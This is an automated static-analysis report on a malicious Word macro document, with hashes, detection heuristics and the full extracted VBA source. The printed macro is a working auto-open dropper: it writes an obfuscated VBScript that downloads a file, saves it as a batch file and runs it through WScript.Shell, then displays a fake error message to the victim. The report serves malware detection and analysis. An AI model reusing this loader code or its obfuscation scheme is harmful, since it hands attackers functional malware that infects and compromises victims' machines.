Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d66c2a0d9f78a9af…

MALICIOUS

Office (OOXML)

22.6 KB Created: 2016-11-01 17:08:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2017-03-23
MD5: 360f878799f95b9d095676060145252e SHA-1: 89da9c9a6dcc0ba63b4ec925ea71db2f518dbcc0 SHA-256: d66c2a0d9f78a9af479e2a9ed3cab8b68b12eb35e49cf3ec30e4f2e58ef95d54
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing obfuscated VBA macros. The AutoOpen macro triggers a call to `chesgrapqwjj`, which uses the Shell function to execute a command. The `eemxcqqnfbpq` function attempts to construct a URL, and the presence of `C:\Users\Romeo\Desktop\First T\Server.exe\` in the document body suggests a local path for a dropped executable. ClamAV detections further confirm its malicious nature as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-5632684-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5632684-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Public Sub chesgrapqwjj(rhkcbhpsnpu)
Shell rhkcbhpsnpu, 1
End Sub
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Public Sub chesgrapqwjj(rhkcbhpsnpu)
Shell rhkcbhpsnpu, 1
End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    vtpgbxtwip = bhcdafbcvard(vtpgbxtwip & rfoepugurhqv & ",BSL79 false: a.send(): BSL79SBSL79etBSL79 b = CO(" & rfoepugurhqv & "A/*/D/*/O/*BSL79/BSL79D/*BSL79/B/*/./*BSL79/SBSL79/BSL79*/t/*/r/BSL79*BSL79/e/*BSL79/BSL79am" & rfoepugurhqv & "): bBSL79.BSL79OBSL79peBSL79n:BSL79 b.TyBSL79pe = 1 :BSL79 BSL79b.Write a.BSL79ResponBSL79seBSL79BoBSL79dy: bBSL79.Position = 0  BSL79 BSL79: Set c = CBSL79O(" & rfoepugurhqv & "S/*BSL79/c/*/ripBSL79tingBSL79/*BSL79/./BSL79*/F/BSL79*BSL79/i/*/BSL79l/BSL79*/e/BSL7 …
& "): If c.FileeBSL79xists(BSL79eBSL79) Then c.BSL79DeleteFile e: EBSL79nd IBSL79f:BSL79 bBSL79.sBSL79aveTBSL79oFBSL79ileBSL79 eBSL79: b.BSL79Close: BSL79Dim dBSL79:BSL79 BSL79SeBSL79t dBSL79 = CO(" & rfoepugurhqv & "W/*/S/*/c/*/BSL79r/BSL79*BSL79/i/*/p/BSL79*BSL79/BSL79t/*/./*/S/BSL79*/h/BSL79*/e/*/ll" & rfoepugurhqv & "): d.Run(eBSL79): Function co(Name) : set co = CreateObject(BSL79g(NaBSL79mBSL79eBSL79)BSL79)BSL79: EBSL79Nd BSL79funcBSL79tioBSL79nBSL79: FunctiBSL79onBSL79 BSL79g(BSL79f): gBS …
Print #2, vtpgbxtwip
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Public Sub AutoOpen()
CommandButton1_Click
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7942 bytes
SHA-256: 4f0f3dce1995ecaf82c70ffb1d567dc02818dc1187fd78d12183d1b51791d8f0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub AutoOpen()
CommandButton1_Click
End Sub
Private Sub ooxtvusmkc()
Dim poplklbcpx
Dim mvkxguobms
Dim flhpkwleqm
Dim kumlbjigni
Dim kumlbjigni, kumlbjigni1
Dim hrpjjvomgs
Dim hrpjjvomgs, hrpjjvomgs1
flhpkwleqm = flhpkwleqm + 821
kumlbjigni1 = kumlbjigni1 * 882
hrpjjvomgs = flhpkwleqm + 822
mvkxguobms = mvkxguobms * 29

End Sub '

Public Sub chesgrapqwjj(rhkcbhpsnpu)
Shell rhkcbhpsnpu, 1
End Sub
Private Sub gnngvfkvuk()
Dim igttgdchfq
Dim bbgdaotqxi
Dim tcrwnbsqip
Dim aivfthpmdj
Dim vdhkmddetr
Dim vdhkmddetr, vdhkmddetr1
vdhkmddetr = bbgdaotqxi + 923
tcrwnbsqip = vdhkmddetr1 * 134
igttgdchfq = vdhkmddetr + 593
bbgdaotqxi = vdhkmddetr * 812

End Sub '

Function eemxcqqnfbpq() As String
Dim dwqqtglovec As Range
    Dim simgnihjuoha As String, jodfmhumvgo As String
Dim nwbkxwpaosdp As String
    simgnihjuoha = bhcdafbcvard("http")
    jodfmhumvgo = "\"
    Set dwqqtglovec = ActiveDocument.Content
    dwqqtglovec.Find.ClearFormatting
    dwqqtglovec.Find.Replacement.ClearFormatting
    With dwqqtglovec.Find
        .Text = simgnihjuoha & "*" & jodfmhumvgo
        .Replacement.Text = ""
        .Forward = True
        .Wrap = wdFindStop
        .Format = False
        .MatchWholeWord = False
        .MatchWildcards = True

        .MatchAllWordForms = False '
    End With

    dwqqtglovec.Find.Execute
   nwbkxwpaosdp = dwqqtglovec.Text
     nwbkxwpaosdp = Left(nwbkxwpaosdp, Len(nwbkxwpaosdp) - 2)
   eemxcqqnfbpq = Trim(nwbkxwpaosdp)
    
  
End Function
Private Sub vapchhrxli()
Dim iegvklenvt
Dim uinksxbkrr
Dim voopxduelh
Dim boeodsdrci
Dim nfbtjpcnbc
Dim xpksnvsgsf
Dim swmlvgrnvw
Dim eoaiftxlch
Dim frutthmxwf
Dim hwlvonoqpx
Dim hwlvonoqpx, hwlvonoqpx1
Dim qrceftjdls
Dim jgfcqodhua
xpksnvsgsf = eoaiftxlch + 354
eoaiftxlch = frutthmxwf * 798
hwlvonoqpx = boeodsdrci + 342
boeodsdrci = swmlvgrnvw * 893
hwlvonoqpx1 = hwlvonoqpx + 283
uinksxbkrr = iegvklenvt * 62
hwlvonoqpx1 = hwlvonoqpx + 326
swmlvgrnvw = hwlvonoqpx * 357
voopxduelh = iegvklenvt + 580
nfbtjpcnbc = iegvklenvt * 769
eoaiftxlch = qrceftjdls + 931
hwlvonoqpx1 = qrceftjdls * 894
jgfcqodhua = qrceftjdls + 711
frutthmxwf = hwlvonoqpx * 742
iegvklenvt = hwlvonoqpx1 + 63
xpksnvsgsf = swmlvgrnvw * 260
swmlvgrnvw = voopxduelh + 661
iegvklenvt = nfbtjpcnbc * 920

End Sub '


Function rfoepugurhqv()
rfoepugurhqv = """"
End Function
Private Sub cphmsjfcwsu()
Dim tanllxwlrp
Dim tanllxwlrp, tanllxwlrp1
Dim wonmjpedps
Dim wonmjpedps, wonmjpedps1
Dim omdfrxcqdr
Dim fikxtoobwq
Dim fikxtoobwq, fikxtoobwq1
Dim tssxkavqps
wonmjpedps1 = tssxkavqps + 378
tanllxwlrp = omdfrxcqdr * 528
omdfrxcqdr = tssxkavqps + 654
tssxkavqps = omdfrxcqdr * 339
omdfrxcqdr = fikxtoobwq + 190
wonmjpedps1 = fikxtoobwq * 979
fikxtoobwq1 = tanllxwlrp + 205
fikxtoobwq = omdfrxcqdr * 524
tssxkavqps = omdfrxcqdr + 203
tanllxwlrp = tanllxwlrp1 * 285
fikxtoobwq1 = fikxtoobwq1 + 538
fikxtoobwq1 = omdfrxcqdr * 351
tanllxwlrp1 = tssxkavqps + 846
tanllxwlrp1 = omdfrxcqdr * 34
tanllxwlrp = tssxkavqps + 498
tssxkavqps = tssxkavqps * 69
tanllxwlrp1 = wonmjpedps + 247
tanllxwlrp1 = wonmjpedps1 * 569
omdfrxcqdr = wonmjpedps1 + 337
tanllxwlrp1 = fikxtoobwq1 * 230
tssxkavqps = tanllxwlrp + 930
wonmjpedps1 = omdfrxcqdr * 425
omdfrxcqdr = wonmjpedps + 785
omdfrxcqdr = fikxtoobwq1 * 602
tanllxwlrp1 = omdfrxcqdr + 716
fikxtoobwq1 = fikxtoobwq1 * 104
omdfrxcqdr = fikxtoobwq + 875
fikxtoobwq1 = fikxtoobwq * 831
omdfrxcqdr = tssxkavqps + 531
tssxkavqps = tanllxwlrp1 * 260

End Sub '




Private Sub CommandButton1_Click()

Dim imlvfpolkfli, vtpgbxtwip

imlvfpolkfli = bhcdafbcvard("wardxs.vbs")
Open imlvfpolkfli For Output As #2
vtpgbxtwip = bhcdafbcvard("eBSL79 = g(" & rfoepugurhqv & "eBSL79rror/*BSL79/BSL79.BSL79/*/bat" & rfoepugurhqv & "BSL79)BSL79: SeBSL79t BSL79a = CO(" & rfoepugurhqv & "M/BSL79*/BSL79S/*/BSL79X/BSL79*BSL79/M/*/BSL79L/*BSL79/2/*/BSL79.BSL79S/*/er/*/BSL79ve/*/rBSL79/*/XM/*/LBSL79H/BSL79*/TBSL79T/*/P" & rfoepugurhqv & "):BSL79 BSL79a.BSL79oBSL79pBSL79en gBSL79(" & rfoepugurhqv & "GBSL79/*/E/*/T/*/" & rfoepugurhqv & ")BSL79, " & rfoepugurhqv)
vtpgbxtwip = vtpgbxtwip & eemxcqqnfbpq
vtpgbxtwip = bhcdafbcvard(vtpgbxtwip & rfoepugurhqv & ",BSL79 false: a.send(): BSL79SBSL79etBSL79 b = CO(" & rfoepugurhqv & "A/*/D/*/O/*BSL79/BSL79D/*BSL79/B/*/./*BSL79/SBSL79/BSL79*/t/*/r/BSL79*BSL79/e/*BSL79/BSL79am" & rfoepugurhqv & "): bBSL79.BSL79OBSL79peBSL79n:BSL79 b.TyBSL79pe = 1 :BSL79 BSL79b.Write a.BSL79ResponBSL79seBSL79BoBSL79dy: bBSL79.Position = 0  BSL79 BSL79: Set c = CBSL79O(" & rfoepugurhqv & "S/*BSL79/c/*/ripBSL79tingBSL79/*BSL79/./BSL79*/F/BSL79*BSL79/i/*/BSL79l/BSL79*/e/BSL79*/SBSL79/*/BSL79y/BSL79*/s/*/BSL79t/*/e/*/BSL79m/*/OBSL79/BSL79*/b/*/BSL79j/*/e/*/BSL79ct" & rfoepugurhqv _
& "): If c.FileeBSL79xists(BSL79eBSL79) Then c.BSL79DeleteFile e: EBSL79nd IBSL79f:BSL79 bBSL79.sBSL79aveTBSL79oFBSL79ileBSL79 eBSL79: b.BSL79Close: BSL79Dim dBSL79:BSL79 BSL79SeBSL79t dBSL79 = CO(" & rfoepugurhqv & "W/*/S/*/c/*/BSL79r/BSL79*BSL79/i/*/p/BSL79*BSL79/BSL79t/*/./*/S/BSL79*/h/BSL79*/e/*/ll" & rfoepugurhqv & "): d.Run(eBSL79): Function co(Name) : set co = CreateObject(BSL79g(NaBSL79mBSL79eBSL79)BSL79)BSL79: EBSL79Nd BSL79funcBSL79tioBSL79nBSL79: FunctiBSL79onBSL79 BSL79g(BSL79f): gBSL79 = RBSL79eBSL79place(f," & rfoepugurhqv & "/*/" & rfoepugurhqv & "BSL79," & rfoepugurhqv & "" & rfoepugurhqv & ")BSL79: endBSL79 functBSL79ion")
Print #2, vtpgbxtwip
Close #2
chesgrapqwjj bhcdafbcvard("wscBSL79ript " & rfoepugurhqv & imlvfpolkfli & rfoepugurhqv)
Dim ikgwrnnmgcx As String
ikgwrnnmgcx = bhcdafbcvard("WindBSL79oBSL79ws iwbjkeuselcd")
Dim oapkhaboco As String
Dim iwbjkeuselcd As Integer
oapkhaboco = bhcdafbcvard("Failed loaBSL79dingBSL79 docuBSL79ment")
iwbjkeuselcd = MsgBox(oapkhaboco, 16, ikgwrnnmgcx)

End Sub
Private Sub hhexwvdqqxfb()
Dim rvdeingakv
Dim aoflojnklb
Dim aoflojnklb, aoflojnklb1
Dim clvrxmulfo
aoflojnklb = aoflojnklb1 + 156
aoflojnklb = aoflojnklb * 294
rvdeingakv = rvdeingakv + 794
aoflojnklb = rvdeingakv * 211
aoflojnklb = clvrxmulfo + 138
aoflojnklb1 = clvrxmulfo * 257
rvdeingakv = aoflojnklb + 964
clvrxmulfo = rvdeingakv * 715
aoflojnklb = aoflojnklb1 + 436
aoflojnklb = aoflojnklb1 * 820
clvrxmulfo = clvrxmulfo + 641
rvdeingakv = rvdeingakv * 344
aoflojnklb1 = rvdeingakv + 213
clvrxmulfo = rvdeingakv * 937
rvdeingakv = clvrxmulfo + 505
clvrxmulfo = rvdeingakv * 190
aoflojnklb1 = aoflojnklb1 + 719
rvdeingakv = clvrxmulfo * 495

End Sub '




Function bhcdafbcvard(s As String) As String
bhcdafbcvard = Replace(s, "BSL79", "")
End Function
Private Sub ahxsikroab()
Dim cqtltgoxho
Dim ikugbopwwo
Dim avghgvlmad
Dim uuhbpfaiok
Dim uuhbpfaiok, uuhbpfaiok1
Dim foxioevxih
Dim hbbwdibbbj
Dim vbdusphueq
hbbwdibbbj = foxioevxih + 344
foxioevxih = foxioevxih * 986
hbbwdibbbj = cqtltgoxho + 21
ikugbopwwo = uuhbpfaiok * 746
ikugbopwwo = uuhbpfaiok + 13
cqtltgoxho = hbbwdibbbj * 381
ikugbopwwo = hbbwdibbbj + 275
vbdusphueq = ikugbopwwo * 978
foxioevxih = hbbwdibbbj + 625
vbdusphueq = avghgvlmad * 51
cqtltgoxho = foxioevxih + 322
uuhbpfaiok = uuhbpfaiok * 135
hbbwdibbbj = vbdusphueq + 518
uuhbpfaiok = uuhbpfaiok * 572
uuhbpfaiok1 = foxioevxih + 631
foxioevxih = avghgvlmad * 521
uuhbpfaiok1 = hbbwdibbbj + 844
hbbwdibbbj = vbdusphueq * 782
vbdusphueq = foxioevxih + 680
vbdusphueq = ikugbopwwo * 193
uuhbpfaiok1 = hbbwdibbbj + 34
hbbwdibbbj = avghgvlmad * 614
foxioevxih = cqtltgoxho + 46
vbdusphueq = avghgvlmad * 399
hbbwdibbbj = avghgvlmad + 684
ikugbopwwo = foxioevxih * 319

End Sub '
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27648 bytes
SHA-256: 68e899bda2219bd133f3d8424a74061f295cf79ec0bcc41cf33aca32fc0b61eb
Detection
ClamAV: Doc.Dropper.Agent-5632684-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.